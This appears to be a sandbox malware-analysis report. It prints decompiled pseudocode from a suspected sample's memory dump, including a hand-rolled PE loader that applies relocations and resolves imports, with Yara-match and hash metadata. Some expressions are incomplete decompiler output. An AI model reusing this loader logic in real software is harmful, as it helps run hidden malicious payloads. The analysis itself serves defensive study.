                                                                                                                                                                                                						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                                						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                						_t151 =  *_t124;
                                                                                                                                                                                                						_t125 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                						_t235 = _t234 -  *_t125;
                                                                                                                                                                                                						__eflags = _t258 - _t151;
                                                                                                                                                                                                						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                                						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                                						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                                							L49:
                                                                                                                                                                                                							__eflags = _t235 - _t258;
                                                                                                                                                                                                							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                                							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                                							__eflags = _t222 - 4;
                                                                                                                                                                                                							if(_t222 != 4) {
                                                                                                                                                                                                								L53:
                                                                                                                                                                                                								_t269 = 0;
                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t161 =  *_t272;
                                                                                                                                                                                                								__eflags =  *(_t161 + 4);
                                                                                                                                                                                                								_t154 = _a4;
                                                                                                                                                                                                								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                                									goto L53;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									__eflags = _t154 - _t235;
                                                                                                                                                                                                									if(_t154 != _t235) {
                                                                                                                                                                                                										goto L53;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t269 = _t222 - 3;
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							_t132 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                							E00B05DD0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                                							_t134 = _t272 + 0x5c;
                                                                                                                                                                                                							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                                							__eflags =  *_t134;
                                                                                                                                                                                                							E00B04B30( *_t134,  *_t272);
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							__eflags = _t235;
                                                                                                                                                                                                							if(_t235 != 0) {
                                                                                                                                                                                                								L46:
                                                                                                                                                                                                								__eflags = _t222;
                                                                                                                                                                                                								if(_t222 != 0) {
                                                                                                                                                                                                									_t162 =  *_t272;
                                                                                                                                                                                                									__eflags =  *(_t162 + 4);
                                                                                                                                                                                                									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                                										__eflags = _t235 - _t258;
                                                                                                                                                                                                										if(_t235 <= _t258) {
                                                                                                                                                                                                											goto L49;
                                                                                                                                                                                                										}
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								__eflags = _t222 - 4;
                                                                                                                                                                                                								if(_t222 == 4) {
                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						asm("sbb edi, edi");
                                                                                                                                                                                                						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                                						__eflags = _t271;
                                                                                                                                                                                                						return _t271;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						__eflags = _t218 - 4;
                                                                                                                                                                                                						if(_t218 == 4) {
                                                                                                                                                                                                							goto L34;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t173 =  *_t272;
                                                                                                                                                                                                							__eflags =  *(_t173 + 4);
                                                                                                                                                                                                							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t88 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                								__eflags = _t254 -  *_t88;
                                                                                                                                                                                                								if(_t254 !=  *_t88) {
                                                                                                                                                                                                									goto L34;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									return 1;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					return 3;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}
                                                                                                                                                                                                0x00b02ef6
                                                                                                                                                                                                0x00b02efb
                                                                                                                                                                                                0x00b02efb
                                                                                                                                                                                                0x00b02efe
                                                                                                                                                                                                0x00b02f03
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02e27
                                                                                                                                                                                                0x00b02e29
                                                                                                                                                                                                0x00b02e36
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02e36
                                                                                                                                                                                                0x00b02e29
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02e25
                                                                                                                                                                                                0x00b02f09
                                                                                                                                                                                                0x00b02f0e
                                                                                                                                                                                                0x00b02f11
                                                                                                                                                                                                0x00b02f14
                                                                                                                                                                                                0x00b02fbf
                                                                                                                                                                                                0x00b02fbf
                                                                                                                                                                                                0x00b02f1a
                                                                                                                                                                                                0x00b02f1a
                                                                                                                                                                                                0x00b02f1a
                                                                                                                                                                                                0x00b02f1f
                                                                                                                                                                                                0x00b02f49
                                                                                                                                                                                                0x00b02f4c
                                                                                                                                                                                                0x00b02f4c
                                                                                                                                                                                                0x00b02f51
                                                                                                                                                                                                0x00b02f53
                                                                                                                                                                                                0x00b02f55
                                                                                                                                                                                                0x00b02f58
                                                                                                                                                                                                0x00b02f5b
                                                                                                                                                                                                0x00b02f63
                                                                                                                                                                                                0x00b02f68
                                                                                                                                                                                                0x00b02f68
                                                                                                                                                                                                0x00b02f6e
                                                                                                                                                                                                0x00b02f71
                                                                                                                                                                                                0x00b02f74
                                                                                                                                                                                                0x00b02f77
                                                                                                                                                                                                0x00b02f79
                                                                                                                                                                                                0x00b02f79
                                                                                                                                                                                                0x00b02f7a
                                                                                                                                                                                                0x00b02f7a
                                                                                                                                                                                                0x00b02f77
                                                                                                                                                                                                0x00b02f88
                                                                                                                                                                                                0x00b02f8b
                                                                                                                                                                                                0x00b02f8f
                                                                                                                                                                                                0x00b02f94
                                                                                                                                                                                                0x00b02f97
                                                                                                                                                                                                0x00b02f9a
                                                                                                                                                                                                0x00b02f9a
                                                                                                                                                                                                0x00b02f9a
                                                                                                                                                                                                0x00b02f9d
                                                                                                                                                                                                0x00b02f9d
                                                                                                                                                                                                0x00b02fa0
                                                                                                                                                                                                0x00b02fa0
                                                                                                                                                                                                0x00b02f21
                                                                                                                                                                                                0x00b02f21
                                                                                                                                                                                                0x00b02f31
                                                                                                                                                                                                0x00b02f34
                                                                                                                                                                                                0x00b02f39
                                                                                                                                                                                                0x00b02f39
                                                                                                                                                                                                0x00b02f3c
                                                                                                                                                                                                0x00b02f3f
                                                                                                                                                                                                0x00b02f42
                                                                                                                                                                                                0x00b02f44
                                                                                                                                                                                                0x00b02f44
                                                                                                                                                                                                0x00b02fa3
                                                                                                                                                                                                0x00b02fa5
                                                                                                                                                                                                0x00b02fa8
                                                                                                                                                                                                0x00b02fa8
                                                                                                                                                                                                0x00b02fae
                                                                                                                                                                                                0x00b02fb2
                                                                                                                                                                                                0x00b02fb5
                                                                                                                                                                                                0x00b02fb7
                                                                                                                                                                                                0x00b02fb7
                                                                                                                                                                                                0x00b02fc8
                                                                                                                                                                                                0x00b02fca
                                                                                                                                                                                                0x00b02fca
                                                                                                                                                                                                0x00b02fd2
                                                                                                                                                                                                0x00b02fe0
                                                                                                                                                                                                0x00b02fe3
                                                                                                                                                                                                0x00b02fe5
                                                                                                                                                                                                0x00b03005
                                                                                                                                                                                                0x00b03005
                                                                                                                                                                                                0x00b03008
                                                                                                                                                                                                0x00b0300e
                                                                                                                                                                                                0x00b0300f
                                                                                                                                                                                                0x00b03012
                                                                                                                                                                                                0x00b03014
                                                                                                                                                                                                0x00b03017
                                                                                                                                                                                                0x00b0301a
                                                                                                                                                                                                0x00b0301d
                                                                                                                                                                                                0x00b03021
                                                                                                                                                                                                0x00b03024
                                                                                                                                                                                                0x00b03027
                                                                                                                                                                                                0x00b0302a
                                                                                                                                                                                                0x00b0302c
                                                                                                                                                                                                0x00b0302c
                                                                                                                                                                                                0x00b0302f
                                                                                                                                                                                                0x00b03031
                                                                                                                                                                                                0x00b03031
                                                                                                                                                                                                0x00b03034
                                                                                                                                                                                                0x00b03036
                                                                                                                                                                                                0x00b03039
                                                                                                                                                                                                0x00b03041
                                                                                                                                                                                                0x00b03044
                                                                                                                                                                                                0x00b03049
                                                                                                                                                                                                0x00b03049
                                                                                                                                                                                                0x00b0304f
                                                                                                                                                                                                0x00b03052
                                                                                                                                                                                                0x00b03055
                                                                                                                                                                                                0x00b03057
                                                                                                                                                                                                0x00b03057
                                                                                                                                                                                                0x00b03058
                                                                                                                                                                                                0x00b03058
                                                                                                                                                                                                0x00b03063
                                                                                                                                                                                                0x00b03063
                                                                                                                                                                                                0x00b03063
                                                                                                                                                                                                0x00b03066
                                                                                                                                                                                                0x00b03069
                                                                                                                                                                                                0x00b03069
                                                                                                                                                                                                0x00b0306c
                                                                                                                                                                                                0x00b0306c
                                                                                                                                                                                                0x00b0302f
                                                                                                                                                                                                0x00b0306f
                                                                                                                                                                                                0x00b03072
                                                                                                                                                                                                0x00b03075
                                                                                                                                                                                                0x00b03077
                                                                                                                                                                                                0x00b0307a
                                                                                                                                                                                                0x00b0307c
                                                                                                                                                                                                0x00b0307f
                                                                                                                                                                                                0x00b03082
                                                                                                                                                                                                0x00b03084
                                                                                                                                                                                                0x00b03087
                                                                                                                                                                                                0x00b0308f
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                • Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction ID: a717f7419f3d52e66a13698972949a04bc408bd0610980512010a89067b564af
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CD116716006019FCB28CF6DC8C4A6ABBF5FF98744B2489ADE88AC7791D771E944CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 52%
                                                                                                                                                                                                			E00B02B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                				signed int _v5;
                                                                                                                                                                                                				signed short _v12;
                                                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                                                				signed int* _v20;
                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                				unsigned int _v28;
                                                                                                                                                                                                				signed short* _v32;
                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                				intOrPtr* _v40;
                                                                                                                                                                                                				signed short* _v44;
                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                				unsigned int _v52;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				_Unknown_base(*)()* _v60;
                                                                                                                                                                                                				signed int _v64;
                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                				unsigned int _v76;
                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                				signed int _t149;
                                                                                                                                                                                                				void* _t189;
                                                                                                                                                                                                				signed int _t194;
                                                                                                                                                                                                				signed int _t196;
                                                                                                                                                                                                				intOrPtr _t236;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                				_v24 = _v72;
                                                                                                                                                                                                				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                                                                                                                                                                                				_v56 = _t236;
                                                                                                                                                                                                				if(_t236 == 0) {
                                                                                                                                                                                                					L13:
                                                                                                                                                                                                					while(0 != 0) {
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(8);
                                                                                                                                                                                                					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                                                                                                                                                                                						L35:
                                                                                                                                                                                                						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                                                                                                                                                                                						while(0 != 0) {
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                							 *_a12 = _v68;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                                                                                                                                                                                						return _v68(_a4, 1, _a8);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v84 = 0x80000000;
                                                                                                                                                                                                					_t149 = 8;
                                                                                                                                                                                                					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                                                                                                                                                                                					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                                                						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                						if(_v36 == 0) {
                                                                                                                                                                                                							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_v36 != 0) {
                                                                                                                                                                                                							if( *_v16 == 0) {
                                                                                                                                                                                                								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_v20 =  *_v16 + _a4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                							while( *_v20 != 0) {
                                                                                                                                                                                                								if(( *_v20 & _v84) == 0) {
                                                                                                                                                                                                									_v88 =  *_v20 + _a4;
                                                                                                                                                                                                									_v60 = GetProcAddress(_v36, _v88 + 2);
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                                                									 *_v20 = _v60;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v20 =  &(_v20[1]);
                                                                                                                                                                                                								_v64 = _v64 + 4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v16 = _v16 + 0x14;
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t189 = 0xfffffffd;
                                                                                                                                                                                                							return _t189;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L35;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t194 = 8;
                                                                                                                                                                                                				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                                                                                                                                                                                				_t196 = 8;
                                                                                                                                                                                                				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                                                                                                                                                                                				while(0 != 0) {
                                                                                                                                                                                                				}
                                                                                                                                                                                                				while(_v48 > 0) {
                                                                                                                                                                                                					_v28 = _v44[2];
                                                                                                                                                                                                					_v48 = _v48 - _v28;
                                                                                                                                                                                                					_v28 = _v28 - 8;
                                                                                                                                                                                                					_v28 = _v28 >> 1;
                                                                                                                                                                                                					_v32 =  &(_v44[4]);
                                                                                                                                                                                                					_v80 = _a4 +  *_v44;
                                                                                                                                                                                                					_v52 = _v28;
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_v76 = _v52;
                                                                                                                                                                                                						_v52 = _v52 - 1;
                                                                                                                                                                                                						if(_v76 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                                                						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                                                						_v40 = (_v12 & 0x0000ffff) + _v80;
                                                                                                                                                                                                						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                                                							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                                                								 *_v40 =  *_v40 + _v56;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							 *_v40 =  *_v40 + _v56;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v32 =  &(_v32[1]);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v44 = _v32;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                			}





























                                                                                                                                                                                                0x00b02c15
                                                                                                                                                                                                0x00b02c22
                                                                                                                                                                                                0x00b02c22
                                                                                                                                                                                                0x00b02bff
                                                                                                                                                                                                0x00b02c0a
                                                                                                                                                                                                0x00b02c0a
                                                                                                                                                                                                0x00b02c29
                                                                                                                                                                                                0x00b02c29
                                                                                                                                                                                                0x00b02c31
                                                                                                                                                                                                0x00b02c31
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 00B02C84
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00B02C9D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00B02CF9
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B02D18
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 384173800-0
                                                                                                                                                                                                • Opcode ID: efdd5e6a085ebbd1de0e5b4470ab25be3f012cfe7c513c746d9e6d4a77ccdf4a
                                                                                                                                                                                                • Instruction ID: 99e8a0fb3682c9f2769840968035288fa094569006acb8fdf4a495e14bf4ceff
                                                                                                                                                                                                • Opcode Fuzzy Hash: efdd5e6a085ebbd1de0e5b4470ab25be3f012cfe7c513c746d9e6d4a77ccdf4a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BA16A75A00209DFDB14CF98C885AADBBF1FF08314F1485A9E815EB391D734AA85CF64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                			E00AF1C51(signed int __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                				char _t20;
                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t71 = __fp0;
                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                				_t41 =  *0xb0e6dc; // 0x384
                                                                                                                                                                                                				_t13 = E00AFA501(_t41, 0);
                                                                                                                                                                                                				while(_t13 < 0) {
                                                                                                                                                                                                					E00AF97ED( &_v28);
                                                                                                                                                                                                					_t43 =  *0xb0e6e0; // 0x0
                                                                                                                                                                                                					_t15 =  *0xb0e6e4; // 0x0
                                                                                                                                                                                                					_t41 = _t43 + 0xe10;
                                                                                                                                                                                                					asm("adc eax, ebx");
                                                                                                                                                                                                					__eflags = _t15 - _v24;
                                                                                                                                                                                                					if(__eflags > 0) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_t16 = 0xfffffffe;
                                                                                                                                                                                                						L13:
                                                                                                                                                                                                						return _t16;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(__eflags < 0) {
                                                                                                                                                                                                						L4:
                                                                                                                                                                                                						_t17 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xb0e6d0, 0);
                                                                                                                                                                                                						__eflags = _t18;
                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t35 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                                                                                                                                                                                						_t41 =  *0xb0e6dc; // 0x384
                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                						_t13 = E00AFA501(_t41, 0);
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					__eflags = _t41 - _v28;
                                                                                                                                                                                                					if(_t41 >= _v28) {
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t20 =  *0xb0e6e8; // 0x4d3fb90
                                                                                                                                                                                                				_v28 = _t20;
                                                                                                                                                                                                				_t22 = E00AFA6EB(_t41, _t61,  &_v16);
                                                                                                                                                                                                				_v20 = _t22;
                                                                                                                                                                                                				if(_t22 != 0) {
                                                                                                                                                                                                					_t23 = GetCurrentProcess();
                                                                                                                                                                                                					_t24 = GetCurrentThread();
                                                                                                                                                                                                					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xb0e6d0, 0, 0, 2);
                                                                                                                                                                                                					E00AF97ED(0xb0e6e0);
                                                                                                                                                                                                					_t64 = E00AF1A01( &_v28, E00AF1226, _t71);
                                                                                                                                                                                                					__eflags = _t64;
                                                                                                                                                                                                					if(_t64 >= 0) {
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push( *0xb0e760);
                                                                                                                                                                                                						_t51 = 0x27;
                                                                                                                                                                                                						E00AF9ED1(_t51);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t64 = _t61 | 0xffffffff;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t29 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x30))( *0xb0e6d0);
                                                                                                                                                                                                				_t48 =  *0xb0e6dc; // 0x384
                                                                                                                                                                                                				 *0xb0e6d0 = 0;
                                                                                                                                                                                                				E00AFA51D(_t48);
                                                                                                                                                                                                				E00AF85FB( &_v24, 0);
                                                                                                                                                                                                				_t16 = _t64;
                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                			}

























                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1cb0
                                                                                                                                                                                                0x00af1cba
                                                                                                                                                                                                0x00af1cc0
                                                                                                                                                                                                0x00af1cc6
                                                                                                                                                                                                0x00af1cc8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1cc8
                                                                                                                                                                                                0x00af1c94
                                                                                                                                                                                                0x00af1c98
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1c98
                                                                                                                                                                                                0x00af1cd7
                                                                                                                                                                                                0x00af1cd8
                                                                                                                                                                                                0x00af1cd9
                                                                                                                                                                                                0x00af1cda
                                                                                                                                                                                                0x00af1cdb
                                                                                                                                                                                                0x00af1ce0
                                                                                                                                                                                                0x00af1cea
                                                                                                                                                                                                0x00af1cef
                                                                                                                                                                                                0x00af1cf7
                                                                                                                                                                                                0x00af1d12
                                                                                                                                                                                                0x00af1d15
                                                                                                                                                                                                0x00af1d1f
                                                                                                                                                                                                0x00af1d2a
                                                                                                                                                                                                0x00af1d3d
                                                                                                                                                                                                0x00af1d3f
                                                                                                                                                                                                0x00af1d41
                                                                                                                                                                                                0x00af1d43
                                                                                                                                                                                                0x00af1d44
                                                                                                                                                                                                0x00af1d4c
                                                                                                                                                                                                0x00af1d4d
                                                                                                                                                                                                0x00af1d53
                                                                                                                                                                                                0x00af1cf9
                                                                                                                                                                                                0x00af1cf9
                                                                                                                                                                                                0x00af1cf9
                                                                                                                                                                                                0x00af1d54
                                                                                                                                                                                                0x00af1d5f
                                                                                                                                                                                                0x00af1d62
                                                                                                                                                                                                0x00af1d68
                                                                                                                                                                                                0x00af1d6e
                                                                                                                                                                                                0x00af1d79
                                                                                                                                                                                                0x00af1d80
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • Opcode ID: 9182654c420f2497732b53c1899954b20d7fdd6af7fda1184218cd76c549e17a
                                                                                                                                                                                                • Instruction ID: 291b3c1e97c483f39489d58463e48e5b9b1d9e0ebc454fbb618cec51246294fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9182654c420f2497732b53c1899954b20d7fdd6af7fda1184218cd76c549e17a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7131A3726082099FD304EFA4FD8597A77A9FB64354F000A2AF725C72A1DE31DD04D752
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E00AF1B16(void* __eflags, void* __fp0) {
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                				intOrPtr _t16;
                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                				char _t24;
                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t71 = __fp0;
                                                                                                                                                                                                				_t38 =  *0xb0e6f4; // 0x380
                                                                                                                                                                                                				_t12 = E00AFA501(_t38, 0);
                                                                                                                                                                                                				while(_t12 < 0) {
                                                                                                                                                                                                					E00AF97ED( &_v28);
                                                                                                                                                                                                					_t40 =  *0xb0e700; // 0x0
                                                                                                                                                                                                					_t14 =  *0xb0e704; // 0x0
                                                                                                                                                                                                					_t41 = _t40 + 0x3840;
                                                                                                                                                                                                					asm("adc eax, ebx");
                                                                                                                                                                                                					__eflags = _t14 - _v24;
                                                                                                                                                                                                					if(__eflags > 0) {
                                                                                                                                                                                                						L13:
                                                                                                                                                                                                						_t15 = 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                                                							L4:
                                                                                                                                                                                                							_t16 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xb0e6ec, 0);
                                                                                                                                                                                                							__eflags = _t17;
                                                                                                                                                                                                							if(_t17 == 0) {
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t33 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                                                                                                                                                                                								_t51 =  *0xb0e6f4; // 0x380
                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                								_t12 = E00AFA501(_t51, 0);
                                                                                                                                                                                                								continue;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							__eflags = _t41 - _v28;
                                                                                                                                                                                                							if(_t41 >= _v28) {
                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
